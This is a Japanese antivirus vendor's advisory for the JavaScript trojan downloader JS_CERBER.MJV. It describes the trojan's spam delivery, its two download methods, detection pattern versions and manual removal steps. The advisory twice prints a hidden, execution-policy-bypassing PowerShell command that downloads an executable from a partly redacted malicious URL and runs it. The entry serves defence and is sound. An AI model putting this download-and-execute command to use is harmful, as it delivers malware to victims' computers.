解析者: Michael Jay Villanueva   

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
    はい

  • 感染報告の有無 :
    はい

  概要

感染経路 Eメールを介したスパム活動, 他のマルウェアからの作成, インターネットからのダウンロード

マルウェアは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。 マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、ワーム活動の機能を備えていません。

マルウェアは、バックドア活動の機能を備えていません。

ただし、情報公開日現在、このWebサイトにはアクセスできません。

マルウェアは、情報収集する機能を備えていません。

  詳細

ファイルサイズ 49,968 bytes
タイプ JS
メモリ常駐 なし
発見日 2017年9月2日
ペイロード URLまたはIPアドレスに接続, ファイルのダウンロード, ウインドウの表示

侵入方法

マルウェアは、他のマルウェアもしくはグレイウェア、または不正リモートユーザによるスパムメールに添付され、コンピュータに侵入します。

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

感染活動

マルウェアは、ワーム活動の機能を備えていません。

バックドア活動

マルウェアは、バックドア活動の機能を備えていません。

ダウンロード活動

マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。

  • https://{BLOCKED}demy.com/wells/wellsfargo/get.php

マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。

  • There are two methods used by this malware to download its intended malicious file:
    • “First method” is done by the malware by using the Native XMLHTTP (MS ActiveX Control). If successfully done, the malware will save the downloaded file using the following filename, then executes the file afterwards:
      • %Application Data%\Microsoft\Windows\Templates\{6 Random Numbers}.exe

    • If the “First method” did not work properly, the malware will proceed with the “Second method”, by also connecting to the same URL mentioned above to download the intended malicious file. However, in this method, the malware uses powershell command for the download routine:
      • powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://{BLOCKED}demy.com/wells/wellsfargo/get.php', '%User Profile%\AppData\Roaming211.exe'); start-process '%User Profile%\AppData\Roaming211.exe';

        If successfully done, the malware will save the downloaded file using the following filename, then executes the file afterwards:
        • %User Profile%\AppData\Roaming211.exe

ただし、情報公開日現在、このWebサイトにはアクセスできません。

情報漏えい

マルウェアは、情報収集する機能を備えていません。

その他

このマルウェアは、二種類の手法で不正なファイルをダウンロードします。

1番目の手法は、Native XMLHTTP (MS ActiveX Control)を利用して実行されます。ダウンロードに成功した場合、マルウェアは以下のファイル名でダウンロードしたファイルを保存して、実行します。

  • %Application Data%\Microsoft\Windows\Templates\{6 Random Numbers}.exe

1番目の手法が失敗した場合、マルウェアは2番目の手法を利用します。1番目と同じURLに接続しますが、不正なファイルをダウンロードするためにマルウェアは以下のPowershellコマンドを利用します。

  • powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://{BLOCKED}demy.com/wells/wellsfargo/get.php', '%User Profile%\AppData\Roaming211.exe'); start-process '%User Profile%\AppData\Roaming211.exe';
ダウンロードに成功すると、マルウェアは以下のファイル名でダウンロードしたファイルを保存して実行します。
  • %User Profile%\AppData\Roaming211.exe

すべての不正活動が完了した後、マルウェアは、以下のメッセージボックスを表示します。

マルウェアは、ルートキット機能を備えていません。

マルウェアは、脆弱性を利用した感染活動を行いません。

  対応方法

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 13.638.07
初回 VSAPI パターンリリース日 2017年9月4日
VSAPI OPR パターンバージョン 13.639.00
VSAPI OPR パターンリリース日 2017年9月5日

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。  
  • %Application Data%\Microsoft\Windows\Templates\{6 Random Numbers}.exe
  • %User Profile%\AppData\Roaming211.exe

手順 4

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「JS_CERBER.MJV」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください